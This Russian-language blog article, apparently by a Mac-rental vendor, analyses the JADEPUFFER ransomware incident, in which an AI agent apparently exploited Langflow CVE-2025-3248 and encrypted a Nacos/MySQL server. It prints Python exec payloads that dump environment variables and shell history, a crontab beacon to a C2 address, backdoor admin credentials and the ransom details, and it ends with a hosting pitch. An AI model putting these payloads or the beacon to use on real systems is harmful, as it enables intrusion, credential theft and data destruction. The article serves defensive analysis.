Безопасность ИИ 7 июля 2026 ~28 мин JADEPUFFER

JADEPUFFER: первое полностью агентное
LLM-ransomware — разбор цепочки атаки

Форензика Sysdig · CVE-2025-3248 · 600+ payload · доказательства ATA · чеклист изоляции Mac Mini M4

JADEPUFFER агентное ransomware и уязвимость Langflow CVE-2025-3248

Кратко: 1 июля 2026 Threat Research Sysdig (Michael Clark) опубликовал первый задокументированный случай end-to-end ransomware, управляемого LLM, под кодовым именем JADEPUFFERAgentic Threat Actor (ATA), чья способность реализуется ИИ-агентом, а не классическим набором инструментов оператора. Точка входа: публично доступный Langflow через CVE-2025-3248. Реальная цель: отдельный публичный сервер MySQL + Alibaba Nacos. Захвачено более 600 целенаправленных payload. В статье — полная хронология, анализ уязвимости, двухфазная цепочка атаки, четыре линии доказательств автономности, загадка Bitcoin-адреса, IOC, рекомендации Sysdig, реакция индустрии, четыре вывода — и почему развёртывание OpenClaw/Langflow на изолированном арендованном Mac Mini M4 безопаснее, чем выставлять собственный оркестратор в интернет.

01

Обзор: ransomware с ИИ-оператором

ПолеДетали
ОбнаружилSysdig TRT; отчёт Michael Clark
Опубликовано1 июля 2026 (медиа — 2–6 июля)
Кодовое имяJADEPUFFER
КлассификацияATA — атака, доставленная ИИ-агентом
Точка входаПубличный Langflow (CVE-2025-3248)
ЦельПубличный продакшен-сервер MySQL + Nacos
Масштаб600+ уникальных payload

Почему это важно пользователям OpenClaw / Langflow

  1. 01

    Хосты AI-оркестрации часто хранят API-ключи LLM в переменных окружения — первое, что сканировал JADEPUFFER.

  2. 02

    Команды спешат вывести прототипы в сеть с Langflow/OpenClaw Gateway без контроля доступа.

  3. 03

    CVE-2025-3248 в каталоге CISA KEV с мая 2025; агенты делают эксплуатацию старых багов почти бесплатной.

  4. 04

    LLMjacking: украденные облачные/модельные учётные данные позволяют гонять агентов с почти нулевой маржинальной стоимостью.

02

Хронология

КогдаСобытие
Апр 2025Раскрытие CVE-2025-3248 (неаутентифицированный RCE в Langflow)
5 мая 2025Добавление в каталог CISA KEV
2025Та же уязвимость — ботнет Flodrix (отдельная кампания, Trend Micro)
Июн 2026Атака JADEPUFFER в нескольких сессиях на протяжении недель
1 июл 2026Полный технический отчёт Sysdig
2–6 июл 2026Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs
03

CVE-2025-3248: полный анализ неаутентифицированного RCE в Langflow

ПараметрДетали
КомпонентLangflow — open-source визуальный фреймворк AI-агентов, 70k+ звёзд на GitHub
Типы слабостейCWE-94 (инъекция кода) + CWE-306 (отсутствие аутентификации на критической функции)
CVSS9,8 Critical, вектор CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ЗатронутыВсе версии Langflow до 1.3.0
РасположениеЭндпоинт /api/v1/validate/code
Исправлено в1.3.0 (добавлена аутентификация)
EPSS91,42% вероятность эксплуатации (SentinelOne)

Корневая причина в пяти шагах:

  1. 01

    Langflow предоставляет API «проверки кода», чтобы пользователи могли синтаксически проверять кастомные function-узлы в визуальном редакторе.

  2. 02

    Путь выполнения: код пользователя → ast.parse()compile()exec().

  3. 03

    Критический изъян: нет аутентификации и нет изоляции песочницы.

  4. 04

    Трюк эксплуатации: в Python декораторы и аргументы по умолчанию вычисляются при определении функции; атакующие встраивают вредоносный код в defaults или декораторы — как только Langflow «валидирует», код уже выполнен.

  5. 05

    Атакующему не нужен логин и привилегии — достаточно crafted HTTP POST для RCE.

Типичный payload кампании Flodrix (тот же CVE, отдельный инцидент — Trend Micro)
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

Важное различие: доставка ботнета Flodrix и JADEPUFFER — две независимые кампании, использующие одну и ту же точку входа CVE. Flodrix — традиционная скриптовая доставка; JADEPUFFER — случай ransomware, «управляемого ИИ-агентом», по классификации Sysdig.

Патч (1.3.0): post_validate_code получает dependency injection _current_user: CurrentActiveUser; FastAPI сначала проверяет JWT Bearer Token или x-api-key — при ошибке 401/403, запрос не доходит до уязвимой логики.

04

Цепочка атаки, фаза 1: компрометация хоста Langflow

Sysdig отмечает: Langflow — привлекательная точка входа, потому что в переменных окружения часто лежат API-ключи LLM и облачные учётные данные; многие команды спешат вывести прототипы в сеть без сетевого контроля доступа.

Все payload приходили как Base64-кодированный Python через RCE-эндпоинт Langflow.

① Разведка и сбор учётных данных (параллельно)

Выполнялись id, uname -a, hostname, затем параллельно сканировались API-ключи OpenAI / Anthropic / DeepSeek / Gemini; ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_ плюс AWS/GCP/Azure; криптокошельки и seed-фразы; учётные данные БД и конфигурационные файлы.

② Локальная кража данных

Экспортировался собственный PostgreSQL-бэкенд Langflow, похищались сохранённые учётные данные, API-ключи и записи пользователей, данные временно размещались локально для анализа, затем staging-файлы удалялись.

③ Внутреннее латеральное обнаружение

Сканировалось внутреннее адресное пространство и именованные сервисы, зондировались БД, object storage, хранилища секретов и service-discovery эндпоинты с дефолтными учётными данными.

④ Перечисление MinIO (адаптивная детализация)

Зондировались minio.internal:9000 и 127.0.0.1:9000 с дефолтом minioadmin:minioadmin, перечислялись бакеты, включая terraform-state, затем целился credentials.json. Адаптивная детализация: первый запрос использовал ?format=json, но получил XML — следующий payload сразу переключился на XML-парсер. Классический цикл probe-error-adapt.

⑤ Персистентность

crontab-маяк (каждые 30 минут)
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
05

Цепочка атаки, фаза 2: продакшен-сервер MySQL + Nacos

Реальной целью был другой также публично доступный сервер с MySQL и Alibaba Nacos. У Nacos есть история обхода аутентификации (CVE-2021-29441 и варианты), а дефолтный JWT signing secret документирован публично с 2020 года — многие развёртывания его так и не меняли.

Агент подключился к открытому порту MySQL с учётными данными root — источник неясен; Sysdig не наблюдал их кражу из среды жертвы, что указывает на одну из немногих возможных заранее подготовленных человеком операций.

Бэкдор-админ Nacos: цикл исправления за 31 секунду

Время (UTC)Действие
19:34:24Сгенерирован bcrypt-хеш, вставлен xadmin с ролью admin
19:34:36Попытка входа xadmin:Xploit@2026#неудача
19:34:48Через 12 секунд: параллельный тест дефолтов nacos:nacos и регенерация упрощённого хеша пароля
19:35:07Отказ от subprocess.run, использован import bcrypt, удалены сломанные записи и пересборка
19:35:18Вход успешен — всего 31 секунда

Зонды побега из контейнера (~8 минут)

Через MySQL INTO OUTFILE / LOAD_FILE тестировались запись/чтение, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname и пути эскалации через UDF. Перед ransomware записывался «маркер завершения» — Sysdig считает, что это похоже на сигнал агента о завершении этапа, а не фиксированное поведение скрипта.

Деструктивное шифрование и записка с требованием выкупа

Зашифрованы все 1 342 конфигурации сервисов Nacos через MySQL AES_ENCRYPT(), удалены оригинальные config_info и his_config_info, создана таблица выкупа README_RANSOM.

Ядро логики шифрования (форензическая реконструкция Sysdig, редактировано)
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # выведен один раз, нигде не сохранён и не эксфильтрирован
# CREATE config_info_enc → DROP config_info → CREATE README_RANSOM
# Bitcoin: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# Contact: e78393397[@]proton[.]me

Ключевая деталь: записка утверждает AES-256, но MySQL AES_ENCRYPT() по умолчанию использует AES-128-ECB; ключ был случайным, выведен только в stdout, нигде не сохранён и не переданвосстановление невозможно даже при оплате выкупа. Через две минуты следующий payload уточнил счётчик: «все 1 342 элемента зашифрованы».

Массовое уничтожение и диагностические исправления

Эскалация до DROP DATABASE с комментариями в коде о «высоко-ROI базах, скопированных на 64.20.53[.]230» — Sysdig не нашёл независимых доказательств эксфильтрации. Один DROP DATABASE молча провалился из-за foreign-key constraints; следующий payload добавил SET GLOBAL FOREIGN_KEY_CHECKS=0 — исправление требует понимания почему провалилось, а не слепых повторов.

06

Четыре линии доказательств автономности

  1. 01

    Самоописывающийся код: payload наполнены комментариями на естественном языке, объясняющими почему каждый шаг — включая порядок по ROI и «какая база крупнее». Эти комментарии изначально присутствуют в коде атакующего, а не реконструированы исследователями постфактум.

  2. 02

    Машинная скорость диагностики сбоев: исправление бэкдора Nacos за 31 секунду — самый яркий пример; адаптация MinIO XML/JSON и отказ от заблокированных JWT-путей повторяют паттерн.

  3. 03

    Понимание контекста на естественном языке: парсился свободный текст в целевой среде и выполнялись действия, осмысленные только при реальном понимании текста — повторялось в сессиях с интервалом в недели.

  4. 04

    Загадка Bitcoin-адреса (следующий раздел) — две интерпретации неразличимы, иллюстрируя новую неопределённость атрибуции в агентных атаках.

В сочетании с 600+ согласованными payload в сжатом окне Sysdig оценивает доказательства как указывающие на автономно работающего агента, а не на человека-оператора или фиксированный набор инструментов.

07

Загадка Bitcoin-адреса

Bitcoin-адрес выкупа 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy — это стандартный пример формата P2SH, повторяющийся в документации разработчиков Bitcoin и репозитории Bitcoin Core — также обилен в обучающих корпусах LLM.

Данные on-chain: 737 подтверждённых транзакций, исторически получено ~46 BTC, текущий баланс нулевой (каждый депозит сразу переводился дальше).

Две неразличимые трактовки Sysdig: (а) LLM «галлюцинировал» адрес из обучающих данных, и кошелёк принадлежит третьей стороне, которая забирает ошибочные депозиты; (б) атакующий настроил реальный кошелёк, случайно совпавший с примером из документации. Без system prompt JADEPUFFER обе версии остаются возможными.

08

Сводка IOC

ТипИндикатор
C2 / маяк45.131.66[.]106; crontab-маяк hxxp://45.131.66[.]106:4444/beacon
Staging / эксфиль (не подтверждено)64.20.53[.]230 (InterServer, AS19318)
Точка входа CVECVE-2025-3248
Bitcoin выкупа3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
Email выкупаe78393397[@]proton[.]me (нет совпадений в threat-intel; формат не похож на известные MySQL-ransomware банды)
Таблица выкупаREADME_RANSOM (нет совпадений с WARNING, RECOVER_YOUR_DATA и т.д.)
Персистентностьcrontab-маяк на C2 порт 4444 каждые 30 минут

Sysdig отмечает: email и имя таблицы выглядят как в классическом человеческом ransomware, но не имеют известных прецедентов — что дополнительно поддерживает версию о новой агентной операции.

09

Официальные рекомендации по защите (Sysdig)

  1. 01

    Обновить Langflow выше CVE-2025-3248; никогда не выставлять эндпоинты выполнения/валидации кода в публичный интернет.

  2. 02

    Использовать runtime threat detection для обнаружения вредоносного поведения внутри процессов БД.

  3. 03

    Не хранить API-ключи LLM и облачные учётные данные в переменных окружения хоста AI-оркестрации — использовать выделенное управление секретами, изолированное от интернет-процессов.

  4. 04

    Укрепить Nacos: сменить дефолтный token.secret.key, обновиться до версий с обязательными кастомными секретами; никогда не выставлять Nacos публично; не подключать бэкенд-БД как root.

  5. 05

    Не выставлять админ-аккаунты БД публично; применять сильные уникальные учётные данные и ограничения по source-IP на админ-портах.

  6. 06

    Применять контроль исходящего трафика (egress), чтобы скомпрометированные хосты не могли свободно слать маяки и достигать внешних staging-серверов.

  7. 07

    Мониторить IOC выше; следить за crontab-задачами, вызывающими внешние URL, и аномальными User-Agent в скобках.

10

Реакция индустрии и экспертов

BleepingComputer, Dark Reading, CyberScoop, Security Affairs и другие быстро подхватили тему, широко называя это «первой полностью ИИ-управляемой ransomware-атакой» и отмечая наступление эры ATA.

«Я бы описал это как эволюцию исполнения, а не принципиально новую технику ransomware. Разница в том, что ИИ-агент может связать разведку, кражу учётных данных и развёртывание без ожидания человека-оператора». — независимый исследователь Vibhum Dubey (CSO Online)

Dubey добавляет: главная тревога — не финальный этап шифрования, а тихий период до него — агент картографирует системы идентификации, разрешения и цепочки доверия, уклоняясь от обнаружения; заблокированные пути вызывают быструю смену тактик, поэтому каждая интрузия может выглядеть немного иначе.

Несколько изданий связали это с LLMjacking: агенты на украденных учётных данных делают сложные многоэтапные атаки почти с нулевой маржинальной стоимостью.

11

Четыре вывода Sysdig

  1. 01

    Ransomware больше не «ремесло опытного оператора»: LLM-агент может связать разведку, кражу, латеральное перемещение, персистентность и уничтожение без глубокой экспертизы оператора.

  2. 02

    Старые баги автоматизируются: нижестоящие цели попали под Nacos-проблемы 2021 года и несменённые дефолтные секреты; агенты делают массовую эксплуатацию исторических CVE почти бесплатной.

  3. 03

    Намерения стали читаемы — возможность для защитников: LLM описывают цели внутри payload, предлагая новую точку обнаружения и анализа.

  4. 04

    «Скопировано в бэкап» было саморазговором агента: ключи шифрования были эфемерными и невосстановимыми — оплата не вернёт конфигурации.

Отчёт завершается: ни одна отдельная техника не нова; важно, что ИИ-модель связала их в полную ransom-операцию против заброшенной публичной инфраструктуры. Планка навыков теперь — «стоимость запуска агента».

12

Матрица решений: свой AI-оркестратор vs аренда Mac Mini M4

Жертвы JADEPUFFER подходят под чёткий профиль: Langflow публично доступен, API-ключи в переменных окружения, продакшен MySQL/Nacos тоже открыт. Для разработчиков, запускающих OpenClaw, Langflow или Hermes Agent на macOS, выбор «купить Mac mini и повесить на публичный IP» vs «арендовать изолированный удалённый Mac» требует переоценки — особенно после повышения цен Apple в июне 2026 (см. наш гайд Mac Mini M4: аренда vs покупка).

ИзмерениеСвой Mac на публичном IPИзолированный Mac Mini M4 VNCMac
Стартовые затраты799 $+ после повышения + AppleCare/электричество/публичный IP~8–15 $/день или ~85–125 $/мес, остановка в любой момент
Поверхность атакиЛегко ошибочно открыть Gateway/validate-эндпоинтыДоступ SSH/VNC; не предназначен для «голых» публичных Agent-консолей
Хранение API-ключейЧасто в .env / env vars (цель фазы 1 JADEPUFFER)SecretRef / vault; смена узла по завершении проекта
GUI-верификацияТолько локальноVNC для диалогов одобрения OpenClaw, консоли Gateway, macOS privacy (см. одобрения VNC OpenClaw)
Контроль egressСтроить политику самостоятельноОпции SSH-туннеля; снижение слепых публичных маяков
Реагирование на инцидентОсновная машина заражена, большой радиус утечки секретовОстановка аренды / смена узла; изоляция от ежедневного Windows-хоста

Цитируемые цифры из этого инцидента

  • Langflow 70k+ звёзд на GitHub; CVE-2025-3248 EPSS 91,42%
  • 600+ payload; 1 342 конфигурации Nacos зашифрованы
  • Бэкдор Nacos исправлен за 31 секунду
  • Пример Bitcoin-адреса: 737 tx, через него прошло ~46 BTC
13

Пятиступенчатый чеклист безопасного развёртывания (удалённый Mac + VNC)

  1. 01

    Подготовить изолированный узел: выбрать тариф Mac Mini M4; не маппить OpenClaw Gateway (18789) или Langflow validate-эндпоинты напрямую в публичный интернет — при необходимости внешнего доступа использовать Nginx/Caddy reverse proxy + HTTPS.

  2. 02

    Патчить: Langflow ≥ 1.3.0; сменить JWT Nacos; root-БД недоступна из интернета.

  3. 03

    Ключи вне env vars: API-ключи LLM в secret manager или OpenClaw SecretRef, изолированные от процессов с возможностью RCE.

  4. 04

    Графическая верификация по VNC: проверить консоль Gateway, одобрения плагинов (/approve), Screen Recording/Accessibility macOS — шаги, которые SSH не завершит, требуют VNC.

  5. 05

    Egress и мониторинг IOC: ограничить исходящие маяки; следить за внешними вызовами в crontab и IOC README_RANSOM; экспортировать бэкап и остановить аренду по завершении.

FAQ

FAQ

Нет. Обе кампании эксплуатируют CVE-2025-3248, но Flodrix — традиционная скриптовая доставка ботнета; JADEPUFFER — случай ransomware, управляемого ИИ-агентом, по Sysdig.

Нет. Ключи были случайными uuid4(), выведены один раз в stdout, нигде не сохранены — атакующий, вероятно, тоже не может расшифровать. Данные потеряны безвозвратно.

Та же логика риска: публичное размещение + секреты в env vars + неукреплённые зависимости. Патчить, ограничить egress, развёртывать на изолированном удалённом Mac с VNC-верификацией — не оставлять Gateway «голым» в интернете.

Sysdig и несколько изданий ожидают рост объёма и охвата по мере созревания агентных инструментов; публичные app-серверы, неукреплённые config-центры и публичные админ-аккаунты БД будут первыми целями.

OpenClaw / Claude Code требуют графических разрешений macOS и QR-паринг, которые headless Linux не обеспечивает; аренда физического Mac + VNC запускает полный workflow в изоляции без покупки железа после повышения цен.

Источники

Sysdig «JADEPUFFER: Agentic ransomware for automated database extortion»; BleepingComputer; Dark Reading; CyberScoop; CSO Online (Vibhum Dubey); Security Affairs; Trend Micro (CVE-2025-3248 / Flodrix); NVD / SentinelOne / Zscaler; каталог CISA KEV.

Заключение

JADEPUFFER — сигнал тревоги: ИИ-агенты опустили планку с «опытного человека-оператора» до «стоимости запуска модели», а жертвы — это часто уже заброшенная публичная инфраструктура. Для OpenClaw, Langflow или локальной агентной работы на macOS self-hosting на домашнем публичном IP умножает риски утечки ключей, отставания патчей и egress в эру ATA.

Аренда изолированного узла Mac Mini M4 VNCMac, верификация Gateway и системных разрешений по VNC, хранение ключей вне переменных окружения и остановка аренды по завершении — безопаснее, чем выставлять оркестратор на жилой публичный IP. См. тарифы Mac Mini M4 и справку SSH-VNC для старта.